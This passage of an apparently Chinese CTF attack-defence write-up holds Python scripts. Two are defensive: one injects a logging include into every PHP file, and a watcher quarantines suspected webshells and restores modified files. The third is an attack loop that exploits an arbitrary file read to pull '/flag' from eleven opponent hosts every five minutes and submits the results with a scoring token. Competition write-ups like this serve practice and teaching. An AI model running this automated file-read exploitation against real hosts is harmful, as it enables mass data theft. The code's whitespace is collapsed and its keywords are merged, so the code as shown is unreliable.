os.chdir(startdir) for obj in os.listdir(os.curdir) : path = os.getcwd() + os.sep + obj if os.path.isfile(path) and'.php'in obj and'log'notin path: modifyip(path,'<?php','<?php\nrequire_once(\'/var/www/html/log.php\');') if os.path.isdir(obj) : scandir(obj) os.chdir(os.pardir) defmodifyip(tfile,sstr,rstr): try: lines=open(tfile,'r').readlines() flen=len(lines)-1 for i in range(flen): if sstr in lines[i]: lines[i]=lines[i].replace(sstr,rstr) open(tfile,'w').writelines(lines)
# 获取所有文件MD5 defgetfilemd5dict(filelist = []): filemd5dict = {} for ori_file in filelist: if Special_path_str notin ori_file: md5 = calcMD5(os.path.realpath(ori_file)) if md5: filemd5dict[ori_file] = md5 return filemd5dict
# 备份所有文件 defbackup_file(filelist=[]): # if len(os.listdir(Special_path['bak'])) == 0: for filepath in filelist: if Special_path_str notin filepath: shutil.copy2(filepath, Special_path['bak'])
if __name__ == '__main__': printu'---------start------------' for value in Special_path: mkdir_p(Special_path[value]) # 获取所有文件路径,并获取所有文件的MD5,同时备份所有文件 ORIGIN_FILE_LIST = getfilelist(CWD) FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST) backup_file(ORIGIN_FILE_LIST) # TODO 备份文件可能会产生重名BUG printu'[*] pre work end!' whileTrue: file_list = getfilelist(CWD) # 移除新上传文件 diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST)) if len(diff_file_list) != 0: # import pdb;pdb.set_trace() for filepath in diff_file_list: try: f = open(filepath, 'r').read() except Exception, e: break if Special_string notin f: try: printu'[*] webshell find : ' + getUnicode(filepath) shutil.move(filepath, os.path.join(Special_path['webshell'], ntpath.basename(filepath) + '.txt')) except Exception as e: printu'[!] move webshell error, "%s" maybe is webshell.'%getUnicode(filepath) try: f = open(os.path.join(Special_path['log'], 'log.txt'), 'a') f.write('newfile: ' + getUnicode(filepath) + ' : ' + str(time.ctime()) + '\n') f.close() except Exception as e: printu'[-] log error : file move error: ' + getUnicode(e)
# 防止任意文件被修改,还原被修改文件 md5_dict = getfilemd5dict(ORIGIN_FILE_LIST) for filekey in md5_dict: if md5_dict[filekey] != FILE_MD5_DICT[filekey]: try: f = open(filekey, 'r').read() except Exception, e: break if Special_string notin f: try: printu'[*] file had be change : ' + getUnicode(filekey) shutil.move(filekey, os.path.join(Special_path['difffile'], ntpath.basename(filekey) + '.txt')) shutil.move(os.path.join(Special_path['bak'], ntpath.basename(filekey)), filekey) except Exception as e: printu'[!] move webshell error, "%s" maybe is webshell.'%getUnicode(filekey) try: f = open(os.path.join(Special_path['log'], 'log.txt'), 'a') f.write('diff_file: ' + getUnicode(filekey) + ' : ' + getUnicode(time.ctime()) + '\n') f.close() except Exception as e: printu'[-] log error : done_diff: ' + getUnicode(filekey) pass time.sleep(2) # print '[*] ' + getUnicode(time.ctime())
以其中一个脚本为例, 首先使用上面提到的插件生成代码后粘贴进来, 然后根据题目分布, 写个 for 循环打一遍, 再利用 while True 让程序死循环跑, 如果某个 ip 已经不可以打的话就将其加到 ban 列表里面, 然后每轮输出一共打了几个, 再 sleep(300), 也就是 5 分钟, 比赛是一轮 10 分钟, 一轮打两次避免特殊情况(如打的时候突然宕机等等)
import requests from time import sleep session = requests.Session() ban = [] whileTrue: num = 0 for i in range(11): if i in ban: continue url = "http://10.10.%d.30/index.php" % i #print url paramsGet = {"a":"show_pic","c":"index","file":"/flag"} headers = {"Cache-Control":"no-cache","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36","Connection":"close","Pragma":"no-cache","Accept-Encoding":"gzip, deflate","Accept-Language":"zh,zh-CN;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6"} try: response = session.get(url, params=paramsGet, headers=headers, timeout=1).content.strip() if len(response) > 20: r2 = requests.post('http://10.66.66.66/api/v1/ad/web/submit_flag/?event_id=1',data={"flag": response,"token":"dzVaFmggB2WXHDjwMGug8uXi7TTRBEBNxZxHGCngJskgm"}) print r2.text if"success"in r2.text: num += 1 #print(response) else: if i notin ban: ban.append(i) sleep(1) except: pass print num sleep(300)
评论